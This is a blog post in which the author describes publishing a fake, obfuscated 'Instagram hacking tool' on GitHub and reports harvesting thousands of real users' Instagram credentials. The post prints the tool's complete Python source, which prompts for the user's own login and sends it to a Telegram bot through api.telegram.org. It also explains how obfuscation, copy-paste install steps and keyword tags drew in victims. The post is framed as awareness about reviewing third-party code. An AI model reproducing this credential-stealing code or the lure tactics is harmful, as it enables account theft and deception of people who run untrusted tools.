Open in app

Sign in

Write

Sign in

Testing a mass social engineering scam through GitHub: I owned 1000+ accounts

Sethu Satheesh
8 min readMar 16, 2024

--

#Social_Engineering part 2. (Part 1: Click Here)

Part One explores social engineering risks, emphasizing human vulnerability in cybersecurity. It warns against blindly using tools without code review, showcasing a crypto mining hack as an example.

Hello guys, my name is Sethu satheesh, i am a cyber security researcher and a software engineer. I am going to take you on a ride through an another crazy hack I’ve done, please read part 1 from the link above. First of all if you are not following me follow me and check my other contents, and also do follow me on instagram @whxitte .

As mentioned earlier, I have have already done another mass social engineering attack via GitHub. Therefore, I will not delve into detailed explanations of social engineering concepts and deeper content. Let’s quickly jump into what I have done. But still i am repeating the phare i said you in the previous post ‘The weakest link in the security chain is often the human element”

Here also no fancy algorithms or complex code — just a simple trick and a few lines of straightforward code. Join me as I walk you through the story of this hack and reveal how I turned a simple prank into a cybersecurity lesson you won’t soon forget. You may feel similarity between the previous and this hack. But it function entirely different way, so i recommend to read this completely to understand about different social engineering tactics that hackers may use against you.

As i said earlier people who are unaware of what hacking really is, they just search for ‘Instagram hacking tool’ or ‘facebook password hacking tool’ something like these on google and probably reach github. They will download one from the results and will literally copy paste the commands given there installing and running it. This is a common trend and mentality of people trying to hack their friend’s or partner’s account. This is exactly i used for my hack.

I created a prank instagram hacking tool that just simulate an instagram hacking process: it just asks for your username and password to login to instagram and then ask for the victim’s name and password list to crack the password. Let me show you the interface of the fake tool i created:

Interface of the fake insta cracking tool i created

The image you see above is the interface of a fake tool I created called ‘Instabreak’. When you run the tool with the command ‘python3 main.py,’ it displays a banner and prompts you to enter your Instagram username and password to log in. Once you input your credentials, it simulates a successful login and asks for a password file containing a wordlist to crack passwords, along with the victim’s username to target. It then verifies if the victim’s username exists on Instagram; if it does, the fake cracking process begins. However, it’s important to note that everything you see here is entirely fake!

Here what happens is when you enter your own username and password at first, it sends both the username and password to my telegram and i recieves the credentials.

The credentials recieved in my telegram

As you can see above, a user downloaded my tool from GitHub and entered their own username and password to log in to Instagram, which was then quickly sent to my Telegram bot. What happened here? A person who believed themselves to be a hacker downloaded a supposed hacking tool from GitHub to target someone else’s account, only to unwittingly become a victim themselves. They either didn’t read or didn’t understand the code I had written and fell for my trap. This is precisely what occurred in this scenario.

I posted this script on GitHub and provided all the commands for installation and setup. By doing so, users could easily copy and paste the commands to run the tool without ever attempting to read the code. This exploits the common human psychology of laziness, which is another factor of social engineering. Additionally, even if they tried to read the code, it wouldn’t be straightforward because I obfuscated the Python code, making it unreadable. Whether you are a beginner in cyber security or a seasoned professional, most of you just skip the reading or de-obfuscation process and just runs the code. The code i posted in github look like:

Obfuscated/unreadable python code

Now let’s look and understand the actual code and its functioning:

# Import the required libraries
import os
import time
import requests

# ANSI escape codes for colors and formatting
blue = '\033[0;34m'
red = '\033[0;31m'
green = '\033[0;32m'
bold = '\033[1m'
reset = '\033[0m'

# Display banner
print("\n")
print(f"{bold}{blue}**********************************************************")
print("""
     _____           _        ____                 _    
    |_   _|         | |      |  _ \crack Instagram| |   
      | |  _ __  ___| |_ __ _| |_) |_ __ ___  __ _| | __
      | | | '_ \/ __| __/ _  |  _ <| '__/ _ \/ _  | |/ /
     _| |_| | | \__ \ || (_| | |_) | | |  __/ (_| |   <
    |_____|_| |_|___/\__\__,_|____/|_|  \___|\__,_|_|\_/
    """)
print("   By Bangladesh Hackers                v 3.0.2p")
print("**********************************************************\n")

# Prompt attacker's username
attacker_username = input(f"{green}[+] Enter your Instagram username to login:{reset} ")
# Prompt attacker's password
attacker_password = input(f"{green}[+] Enter your Instagram password to login:{reset} ")

# Send attacker's username and password to Telegram bot of real hacker
telegram_bot_token = "YOUR_TELEGRAM_BOT_TOKEN"  # Replace with your Telegram bot token
chat_id = "YOUR_CHAT_ID"  # Replace with your Telegram chat ID
message = f"Username: {attacker_username}, Password: {attacker_password.strip()}"
url = f"https://api.telegram.org/bot{telegram_bot_token}/sendMessage?chat_id={chat_id}&text={message}"
response = requests.get(url)
# If the credentials successfully send to attacker show that successfully logged in
if response.status_code == 200:
    print(f"{green}[+]{reset} You successfully logged in.")
# If the credentials send failed to attacker show that login failed
else:
    print(f"{red}[!]{reset} Login failed!")

# Prompt user for wordlist file path
wordlist = input(f"{green}[+] Enter the path to the wordlist file:{reset} ")

# Check if wordlist file exists
if not os.path.isfile(wordlist):
    print(f"{red}Error: Wordlist file not found.{reset}")
    exit(1)

# Prompt user for victim's username 
username = input(f"{green}[+] Enter the Instagram username to crack:{reset} ")

# Start fake cracking process (simulation)
print(f"{green}\nStarting password cracking for user: {username}{reset}")
print(f"{green}Trying connection to the target username {{{username}}}{reset}")
time.sleep(3)
print(f"{green}User {username} exists!\n{reset}")
time.sleep(1)

# Read wordlist line by line and try each password
with open(wordlist, "r") as file:
    for password in file:
        print(f"{blue}[+]{reset} Trying password for {bold}{username}: {password.strip()} {red}{bold}[Failed!]{reset}")
        time.sleep(2)  # Simulate some processing time

print("Password cracking attempt completed.")

Here’s a breakdown of the key components and functionalities of the code:

  1. Banner Display: The code displays a banner using ANSI escape codes for formatting and styling.
  2. User Input: It prompts the attacker to enter their Instagram username and password.
  3. Telegram Bot Integration: Sends the attacker’s username and password to a Telegram bot of the real hacker.
  4. Wordlist Input: Prompts the user for the path to a wordlist file containing potential passwords.
  5. Username Input: Prompts the user for the victim’s Instagram username to crack.
  6. Password Cracking Simulation: Simulates a fake password cracking attempt using the wordlist file just to trick the user. It loops through each password in the wordlist and displays a message indicating a failed attempt.

This code simulates a fake instagram password cracking process to trick the user, and the username and password they enter will be send back to us. We got the credentials of that person !

By this research experiment i done, i recieved 3500+ instagram account credentials and i got 1000+ valid ones. Because i posted it in gitrhub and made it popular by adding tags and proper keywords.

Sample of credentials receiving in my telegram bot

Most of the people especially beginners download and use tools like these because of enthusiasm or something without checking anything just copy pasting the commands given in the github page (Even i was like that). Sometimes even experienced people are lazy to check the third-party code they are using. As someone who once fell into this trap myself, I understand the allure of convenience and the temptation to take shortcuts. However, the consequences of blindly copying and pasting commands from a GitHub page without verifying their authenticity can be dire. In the hack i have done, i successfully used and exploited this human tendancy and mentality — the tendency to trust without verification, to act without scrutiny.

While the creation of fake hacking tools serves as an eye-opening demonstration of social engineering vulnerabilities, it’s crucial to highlight the potential risks and ethical implications associated with such deceptive practices. These tools, if used maliciously, can lead to serious privacy breaches, identity theft, and other cybercrimes. Therefore, ethical considerations must always guide cybersecurity experiments and activities, emphasizing the importance of responsible disclosure, informed consent, and adherence to ethical hacking practices. I used this as part of my research and a social experiment and i also informed the users who fell in it, and i tried to create an awareness and a cybersecurity lesson you won’t soon forget.

This experiment underscores the need for heightened vigilance against social engineering attacks in today’s digital landscape. It specifically tells about the non trusted apps, tools, or software you use may be a danger to you and may the creator of that software can steal your data and harm you. As cyber threats evolve, individuals and organizations must prioritize cybersecurity awareness and education. I urge readers to stay informed about cybersecurity best practices, engage in ethical hacking training, and cultivate a culture of security consciousness. By working together to enhance our cybersecurity defenses and promote ethical hacking principles, we can mitigate the risks posed by social engineering tactics and protect ourselves against cyber threats.

The number of victims increases day by day because the tool becomes top result on github. I removed the tool from github after the research and demonstration.

Now you might have understood the seriousness of ignoring code review and installing fancy codes without reading whats inside it like a script kiddie. An attacker could possibly do anything with you, actually he makes you to do that. That’s the power of social engineering and weakness of human mind.

Hope this write up opened eyes atleast for someone on the internet.

Thanks for reading and Happy Hacking…

[Read part 2 here]

Follow me here and on instagram @whxitte

Cybersecurity
Hacking
Social Engineering
Ethical Hacking
Cyberattack

--

--

Sethu Satheesh

Written by Sethu Satheesh

63 Followers

Cyber security researcher | Software engineer | own: whxite lab

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams